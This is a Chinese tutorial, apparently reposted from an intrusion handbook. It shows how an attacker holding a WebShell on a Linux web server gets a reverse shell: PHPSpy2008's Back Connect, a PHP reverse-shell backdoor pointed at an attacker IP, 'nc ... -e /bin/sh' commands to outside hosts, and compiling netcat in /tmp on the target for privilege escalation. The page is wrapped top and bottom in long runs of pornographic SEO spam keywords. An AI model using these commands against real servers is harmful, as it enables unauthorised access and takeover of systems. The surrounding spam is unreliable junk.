精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Linux下通過WebShell反彈Shell的技巧

安全 黑客攻防
Linux下通過WebShell反彈CmdShell,在網(wǎng)站服務(wù)器入侵提權(quán)過程中的應(yīng)用比Windows環(huán)境下更廣更頻繁。Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是溢出必須在可交互環(huán)境運(yùn)行,否則如果直接在WebShell執(zhí)行,即使能溢出提權(quán)成功,也沒法利用。因此必須要反彈一個(gè)Shell命令行窗口,在命令行終端下執(zhí)行溢出進(jìn)行提權(quán)。

Linux下通過WebShell反彈CmdShell,在網(wǎng)站服務(wù)器入侵提權(quán)過程中的應(yīng)用比Windows環(huán)境下更廣更頻繁。Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是溢出必須在可交互環(huán)境運(yùn)行,否則如果直接在WebShell執(zhí)行,即使能溢出提權(quán)成功,也沒法利用。因此必須要反彈一個(gè)Shell命令行窗口,在命令行終端下執(zhí)行溢出進(jìn)行提權(quán)。

使用PHP WebShell木馬反彈Shell

一般情況下,大多數(shù)PHP WebShell木馬后門都帶有的Back Connect功能彈回一個(gè)Shell。例如在PHPSpy2008木馬后門中,有一個(gè)Back Connect反彈連接功能,可以反彈獲得一個(gè)繼承當(dāng)前WebShell權(quán)限的Shell命令窗口。

在使用Back Connect反彈連接功能前,首先需要使用NC工具在本地監(jiān)聽一個(gè)未使用的端口,例如監(jiān)聽本地8888端口,執(zhí)行如下命令:

  1. nc -vv -l -p 8080 

然后在WebShell的Back Connect反彈連接功能頁中,會(huì)自動(dòng)檢測(cè)本機(jī)的IP地址,在"Your IP"中顯示本機(jī)IP,在"Your Port"中輸入監(jiān)聽的端口,這里為8080。然后選擇要使用的反彈連接方式,PHPSpy2008提供了兩種反彈連接方式,Perl和C,這里使用Perl反彈(圖1)。

圖1

圖1

設(shè)置完畢后,點(diǎn)擊"Start"按鈕,即可發(fā)送Shell窗口到監(jiān)聽端口了。在NC監(jiān)聽窗口中,可得到一個(gè)Shell命令行窗口(圖2)。

圖1

圖2

除了PHPSpy2008之外,還有一些專用的PHP反彈shell網(wǎng)頁后門。首先在本地用文本編輯器打開PHP反彈shell網(wǎng)頁后門文件,在其中找到如下代碼內(nèi)容:

  1. $yourip = "111.123.96.28";  
  2.  
  3. $yourport = '8888'

圖3

圖3

修改設(shè)置其中的反彈IP地址111.123.96.28為本機(jī)IP地址,默認(rèn)反彈端口為8888,可進(jìn)行修改(圖3)。修改后保存文件,將其通過WebShell上傳。假設(shè)上傳后的鏈接地址為http://www.***.com/shell.php。然后在本地打開命令提示符窗口,執(zhí)行如下命令:

  1. nc -vv -l -p 8888 

使用nc監(jiān)聽本地的8888端口。在瀏覽器中訪問http://www.***.com/shell.php,在nc監(jiān)聽的端口中,就可以獲得一個(gè)從網(wǎng)站服務(wù)器上返回來的命令行Shell了。#p#

使用NC反彈Shell

在進(jìn)行Shell反彈時(shí),有時(shí)會(huì)碰到服務(wù)器不支持PHP或者WebShell無法成功反彈Shell的情況,例如有的服務(wù)器只支持JSP,不支持PHP。此時(shí),可以同樣采用Windows下的經(jīng)典的NC反彈Shell方法。

在Windows下反彈CmdShell時(shí),首先要在本機(jī)運(yùn)行"nc -vv -l -p 端口號(hào)"監(jiān)聽端口,然后在WebShell中執(zhí)行"nc -e cmd.exe 監(jiān)聽主機(jī)IP地址  端口",就可以反彈一個(gè)CmdShell。這個(gè)方法在Linux中仍然可行,只不過需要作一點(diǎn)小小的改動(dòng)。

--在本機(jī)監(jiān)聽端口后,在WebShell運(yùn)行nc反彈時(shí),需要發(fā)送的是"/bin/sh",而不是cmd.exe,這樣才夠反彈發(fā)送一個(gè)Linux下的Shell命令行窗口給監(jiān)聽主機(jī)。例如執(zhí)行如下命令:

  1. nc 119.1.44.32 8888 -e /bin/sh 

即可反彈一個(gè)Shell到IP地址為119.1.44.32的監(jiān)聽主機(jī)的8888端口。#p#

遠(yuǎn)程主機(jī)無NC工具時(shí)的解決辦法

在使用NC反彈Shell時(shí),還會(huì)碰到遠(yuǎn)程主機(jī)上不能直接執(zhí)行nc,或者沒有安裝nc工具。碰到這樣的情況,可以給手工給遠(yuǎn)程主機(jī)安裝一個(gè)NC,比較方便的方法是,到http://netcat.sourceforge.net/download.php下載nc源碼,然后在本地Linux機(jī)器上編譯成可執(zhí)行程序后,再將編譯文件上傳到遠(yuǎn)程主機(jī)上。如果本地編譯的程序在遠(yuǎn)程主機(jī)上無法使用,可以直接把源碼傳上去后,在目標(biāo)機(jī)器上直接編譯。

如果需要在目標(biāo)機(jī)器上編譯NC的話,需要注意一些問題,因?yàn)樵诘玫絊hell命令行窗口前,只能在WebShell里執(zhí)行命令,一般每次只能執(zhí)行一條,然后等待執(zhí)行后的結(jié)果回顯。

另外,在編譯時(shí)需要注意程序執(zhí)行路徑的問題。由于Linux下權(quán)限設(shè)置非常嚴(yán)格,即使攻擊者獲得了WebShell,也可能無法直接在WEB網(wǎng)頁目錄下寫入文件,只能在/tmp之類的文件夾中上傳寫入NC源文件(圖4)。

圖4

圖4

例如WebShell在/var/www/目錄,那么在WebShell中執(zhí)行命令默認(rèn)的當(dāng)前路徑都是/var/www/,如果netcat源碼包解壓在了/tmp/netcat-0.7.1文件夾,在編譯netcat進(jìn)行make操作時(shí),由于當(dāng)前路徑是/var/www/,而不是/tmp/netcat-0.7.1,所以在make操作時(shí)會(huì)出錯(cuò)。解決這個(gè)問題其實(shí)很簡(jiǎn)單,可以直接把切換路徑和make操作兩句命令寫成一句,用分號(hào)隔開寫就可以了。

將netcat-0.7.1源文件上傳到可寫文件夾/tmp中后,在WebShell中編譯nc的操作過程及命令如下:

  1. cd /tmp;tar zxvf /tmp/netcat-0.7.1.tar.gz 

圖5

圖5

執(zhí)行該命令后,可以將netcat-0.7.1源文件解壓到/tmp/netcat-0.7.1目錄中(圖5)。然后再執(zhí)行命令:

  1. /tmp/netcat-0.7.1/configure 

配置完畢后,再執(zhí)行如下命令進(jìn)行編譯:

  1. cd /tmp/netcat-0.7.1;make 

由于使用了分號(hào),可同時(shí)執(zhí)行兩條命令,將make跟在目錄切換命令后面,在編譯的時(shí)候就不會(huì)報(bào)錯(cuò)了(圖6)。#p#

圖6 

圖6

 

編譯成功以后,就可以輸入命令反彈Shell了,例如這里nc路徑是/tmp/netcat-0.7.1/nc,在本地執(zhí)行"nc -vv -l -p 8080"命令監(jiān)聽8080號(hào)端口后,在WebShell中執(zhí)行如下命令(圖7):

  1. cd /tmp/netcat-0.7.1;nc 119.1.58.126 8080 -e /bin/sh 

圖7

圖7

即可向主機(jī)反彈回一個(gè)Shell命令行窗口了。需要注意的是,反彈的Linux Shell是沒有$提示符的,執(zhí)行一句返回一句(圖8)。另外,這里反彈Shell時(shí)候運(yùn)行的是/bin/sh,也可以反彈運(yùn)行/bin/bash,但/bin/sh的權(quán)限比/bin/bash要設(shè)置松一些,因此成功率更高一些。

圖8

圖8

【編輯推薦】

  1. 加固IIS讓W(xué)ebshell的簡(jiǎn)單概述
  2. 通過重建方法獲取webshell
  3. 十項(xiàng)Linux安全管理技巧經(jīng)驗(yàn)匯總
  4. Linux網(wǎng)絡(luò)防火墻的實(shí)現(xiàn)并不難!
責(zé)任編輯:佟健 來源: 《大中型網(wǎng)絡(luò)入侵要案》
相關(guān)推薦

2009-07-19 10:48:53

LinuxWebShell反彈CmdLine She

2009-08-07 10:18:13

Linux反彈CmdLine S技巧

2018-06-18 10:33:39

Linux內(nèi)網(wǎng)技巧

2017-09-04 16:20:38

Linuxshell命令

2015-03-06 15:43:39

2009-10-23 08:41:14

Linux系統(tǒng)操作系統(tǒng)Grub

2010-09-26 16:46:05

2013-12-02 09:49:59

2009-12-03 10:07:55

Linuxman命令使用技巧

2014-07-31 11:24:21

Linuxshell命令

2015-03-09 10:22:23

2009-06-19 13:32:40

Java開啟OpenGL

2013-06-28 10:12:20

Linux軟Raid自動(dòng)重組

2020-09-14 08:23:56

日期時(shí)間Shell

2014-07-31 12:07:15

Linux

2019-12-04 12:28:24

TOP命令Linux

2021-12-16 10:53:23

shell命令腳本

2019-08-14 08:03:49

LinuxShell腳本web服務(wù)

2011-12-01 11:02:35

2010-05-19 10:47:21

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

国产精品嫩草影院精东| 久久久视频6r| 波多野结依一区| 337p粉嫩大胆色噜噜噜噜亚洲| 日本国产一区二区三区| 影音先锋男人资源在线观看| 日韩一二三区在线观看| 一本色道a无线码一区v| 99亚洲精品视频| 五月婷婷激情在线| 精品亚洲免费视频| 91精品国产91久久久久久吃药| 国产成人免费观看网站| 超碰成人在线观看| 欧美精品v国产精品v日韩精品| 久久久天堂国产精品| 免费国产在线视频| 风间由美性色一区二区三区| 国产精品xxxxx| 激情五月色婷婷| 色综合色综合| 亚洲美女中文字幕| 美女搡bbb又爽又猛又黄www| 日韩欧美少妇| 亚洲成人免费av| 天天干天天色天天爽| 久久综合九色综合久| 粉嫩aⅴ一区二区三区四区| 国产精品久久久久久亚洲调教 | 操欧美女人视频| 欧美日韩国产天堂| 日韩在线xxx| 91资源在线观看| 亚洲欧洲综合另类在线| 亚洲成色www久久网站| 亚洲三区在线播放| 成人免费看视频| 亚洲在线观看视频| 国产露脸91国语对白| 日韩av二区在线播放| 欧美专区日韩视频| 日韩欧美亚洲一区二区三区| 午夜精品免费| 另类美女黄大片| 小向美奈子av| 欧美韩日一区| 在线播放日韩专区| 男人天堂av电影| 日本一道高清一区二区三区| 精品成a人在线观看| 波多野吉衣在线视频| 九九久久国产| 欧美精品tushy高清| www.色欧美| 免费成人高清在线视频| 欧美视频一区二区三区| 国产一级做a爰片久久| 亚洲a∨精品一区二区三区导航| 欧美性猛交xxxx免费看久久久| 九色自拍视频在线观看| 在线看黄色av| 中文字幕一区二区5566日韩| 亚洲春色在线视频| 日韩欧美小视频| 自拍av一区二区三区| 免费成人深夜夜行网站视频| 伊人影院蕉久影院在线播放| 一区二区在线观看视频| 菠萝蜜视频在线观看入口| 欧美韩日亚洲| 婷婷久久综合九色综合绿巨人 | 国产一区在线不卡| 51蜜桃传媒精品一区二区| 精品人妻少妇嫩草av无码专区 | 不卡的av一区| 日韩在线观看视频一区| 久久综合国产精品| 亚洲成人自拍视频| 中文字幕中文字幕在线中高清免费版 | 国产伦精品一区二区三区视频女| 日韩黄色大片| 欧美成人亚洲成人日韩成人| 日韩精品一区二区不卡| 老司机午夜精品视频| 国产精品尤物福利片在线观看| 国产精品自产拍| thepron国产精品| 日韩亚洲欧美精品| 在线观看wwwxxxx| 欧美日韩国产一区中文午夜| 中文字幕国内自拍| 成人高潮a毛片免费观看网站| 国产丝袜一区二区三区| 久久噜噜色综合一区二区| 欧美激情亚洲| 国产精品久久久久久久久久| 国产熟女一区二区丰满| 99久久婷婷国产综合精品电影 | 91免费国产视频| 四虎在线视频免费观看| 国产精品欧美久久久久一区二区| 日本香蕉视频在线观看| 99久久婷婷国产综合精品首页| 日韩午夜精品视频| 中文字幕成人动漫| 在线成人h网| 国产欧美一区二区三区视频 | 成人综合婷婷国产精品久久免费| 日本一区二区三区视频在线观看 | 国产精品久久久久久久9999 | 粉嫩av亚洲一区二区图片| 欧美一级爽aaaaa大片| 七七久久电影网| 欧美日韩一级二级| 一出一进一爽一粗一大视频| 中国精品18videos性欧美| 国产精品电影在线观看| 欧美 日韩 国产 在线| 国产精品久久久久aaaa| 日韩精品一区二区三区久久| 亚洲一二av| 日韩中文娱乐网| 中文字幕在线播| 99久久免费精品高清特色大片| 樱空桃在线播放| 国产一区高清| 一区二区三区四区精品| 成人免费视频毛片| 成人av网站大全| 青青草综合在线| 99国内精品久久久久| 在线播放国产一区中文字幕剧情欧美| 天堂中文在线网| 成人av在线一区二区三区| www国产无套内射com| 4438五月综合| 精品久久国产精品| 中文在线字幕免费观| 国产亚洲va综合人人澡精品| a√天堂在线观看| 国产成人澳门| 久久久最新网址| 粉嫩小泬无遮挡久久久久久| 一区二区三区在线观看网站| 欧美精品色视频| 久久久久久免费视频| 国产在线拍偷自揄拍精品| 色综合久久久久综合一本到桃花网| 色综合久久66| 蜜臀久久99精品久久久久久| 日韩精品成人一区二区三区| 日韩av电影在线观看| 人人视频精品| 在线亚洲欧美视频| 中文字幕有码视频| 中文字幕在线不卡视频| 中文字幕在线视频一区二区三区| 99精品美女| 91免费国产视频| 蜜臀av在线| 亚洲国产精品久久精品怡红院| 日本在线小视频| 久久奇米777| 黑森林精品导航| 亚洲91视频| www.久久久| 中文日产幕无线码一区二区| 一区二区三区美女xx视频| 91麻豆成人精品国产| 一区二区三区中文字幕在线观看| 挪威xxxx性hd极品| 天堂在线一区二区| 99精品一区二区三区的区别| 成人在线视频中文字幕| 欧美一级电影久久| 国产露出视频在线观看| 欧美美女bb生活片| 久久久久久久9999| 久久综合九色欧美综合狠狠| 久久国产激情视频| 欧美三级视频| 欧美日韩视频在线一区二区观看视频| 欧美jizz18| 性欧美亚洲xxxx乳在线观看| 国产视频福利在线| 欧美一区二区久久| 午夜精品久久久久久久久久久久久蜜桃| 26uuu色噜噜精品一区二区| 超碰在线公开97| 韩国av一区| 日韩国产欧美精品| 中文字幕55页| 亚洲国产日韩一区无码精品久久久| 久久精品系列| 精品一区二区三区毛片| 日韩av资源网| 国产日韩欧美成人| 96av在线| 精品国产欧美成人夜夜嗨| 乱色精品无码一区二区国产盗| 色成年激情久久综合| 538任你躁在线精品视频网站| 97精品电影院| www.日本久久| 日韩经典中文字幕一区| 99热亚洲精品| 91精品国产视频| 欧美日韩高清在线一区| 日韩精品免费视频一区二区三区| 日本欧美国产在线| 里番在线播放| 久久视频在线视频| 国产中文在线视频| 亚洲国产高清福利视频| 国产女人高潮的av毛片| 在线观看日韩电影| 日韩乱码人妻无码中文字幕| 亚洲三级电影网站| 一区二区三区四区免费| 粉嫩一区二区三区在线看| 五月天视频在线观看| 久久亚洲精选| 阿v天堂2017| 欧美激情第10页| 国产成人精品免费看在线播放| 伊人成综合网yiren22| 国产精品露出视频| 二区三区精品| 国产综合久久久久| 四虎4545www国产精品| 欧美有码在线观看视频| 国产拍在线视频| 色综合久久中文字幕综合网小说| 91社区在线观看| 亚洲性av网站| 男女污视频在线观看| 精品视频在线播放| 日韩中文字幕影院| 精品av综合导航| 亚洲国产剧情在线观看| 日韩欧美一级二级| www.国产欧美| 欧美成人福利视频| 精品人妻一区二区三区四区不卡| 在线不卡a资源高清| 97人妻精品一区二区三区软件| 日韩欧美aaa| 特级毛片www| 色婷婷国产精品久久包臀| 在线观看国产亚洲| 欧美日韩中文在线| www.国产毛片| 欧美日韩国产综合视频在线观看 | 国产人妻大战黑人20p| 久久一二三国产| 好吊视频在线观看| 中文字幕国产精品一区二区| 后入内射无码人妻一区| 亚洲欧洲一区二区在线播放| 精品人妻伦九区久久aaa片| 亚洲人成影院在线观看| 欧美激情精品久久| 亚洲国产色一区| av黄色在线看| 欧美视频一区在线观看| 97在线公开视频| 欧美tickling网站挠脚心| 蜜臀av午夜精品| 亚洲美女av网站| 超碰国产在线观看| 久久国产精品电影| 888av在线视频| 国产成人精品在线播放| 999精品嫩草久久久久久99| 国产精品av一区| 国产区精品区| 国产美女视频免费| 亚洲激情另类| av污在线观看| 国产成人精品午夜视频免费| 黄色性生活一级片| 最近日韩中文字幕| 一区二区三区视频免费看| 在线观看亚洲a| 亚洲大尺度视频| 精品呦交小u女在线| 欧美日本一道| 2019精品视频| 日韩精品一页| 久久99九九| 国产精品久久久久久久免费观看| 69sex久久精品国产麻豆| 日本不卡一二三区黄网| 亚洲精品一区二区18漫画| 久久久精品欧美丰满| 欧美黑人性猛交xxx| 色一情一乱一乱一91av| 国产乱码久久久久| 亚洲人在线视频| 欧美极品少妇videossex| 国产精品久久久久久影视| 在线一区二区三区视频| 四虎影视永久免费在线观看一区二区三区| 亚洲人metart人体| 国产女女做受ⅹxx高潮| 国产精品99精品久久免费| 精品久久久久久中文字幕人妻最新| 亚洲美女免费视频| 波多野结衣电车痴汉| 亚洲精品一区二区在线观看| 午夜激情在线观看| 日产精品久久久一区二区福利| 国产劲爆久久| 欧美三级午夜理伦三级老人| 爽爽淫人综合网网站| 成年女人免费视频| 亚洲欧美日韩国产成人精品影院 | 在线观看美女av| 一本色道**综合亚洲精品蜜桃冫| 丰满熟妇乱又伦| 精品国产一区二区三区久久久狼 | 波多野结衣一本| 无吗不卡中文字幕| 亚洲福利在线观看视频| 久久精品国产一区二区三区 | 999亚洲国产精| 精品伦一区二区三区| 综合欧美一区二区三区| 一级一级黄色片| 亚洲区一区二区| 亚洲人体影院| 久久综合伊人77777麻豆| 日韩天天综合| 午夜福利三级理论电影| 亚洲自拍偷拍麻豆| 国产av无码专区亚洲av| 久热精品在线视频| 国产麻豆精品| 天天做天天爱天天高潮| 国产在线观看一区二区| 男女性高潮免费网站| 欧美精品第1页| 成人在线免费看片| 91精品视频大全| 女生裸体视频一区二区三区| 6080国产精品| 一区二区三区欧美亚洲| 国产xxxxxx| 久久久久久久激情视频| 噜噜噜天天躁狠狠躁夜夜精品| 日韩一级性生活片| 不卡av电影在线播放| 国产微拍精品一区| 亚洲男人天堂古典| 福利一区二区免费视频| 亚洲一区二区三区欧美| 国产一区二区电影| 欧美片一区二区| 亚洲国产精品美女| 69久成人做爰电影| 亚洲欧洲国产日韩精品| 国内精品久久久久影院色| 国产精品 欧美激情| 欧美r级电影在线观看| 在线观看特色大片免费视频| 欧美日本亚洲| 紧缚奴在线一区二区三区| 欧美成人国产精品高潮| 亚洲精品美女在线| 欧美aaa大片视频一二区| 美国av在线播放| av电影天堂一区二区在线 | 69精品人人人人| 欧洲在线视频| 欧美一区二区三区电影在线观看 | 亚洲二区免费| 中文字幕丰满乱子伦无码专区| 欧美三级午夜理伦三级中视频| 成人在线播放免费观看| 国产91色在线|亚洲| 久热re这里精品视频在线6| 永久免费未视频| 亚洲福利在线看| 成人一区视频| 青草青青在线视频| 国产精品萝li| 亚洲精品国产一区二| 国产福利成人在线| 亚洲午夜av| 欧美乱大交做爰xxxⅹ小说| 精品久久国产字幕高潮| 日韩精品免费观看视频| 免费视频爱爱太爽了| 日本一区二区三区久久久久久久久不 | 欧美变态口味重另类| 免费观看欧美大片| 一级黄色片播放| 国产亚洲美州欧州综合国| 国产草草影院ccyycom| 国产精品久久久久aaaa九色|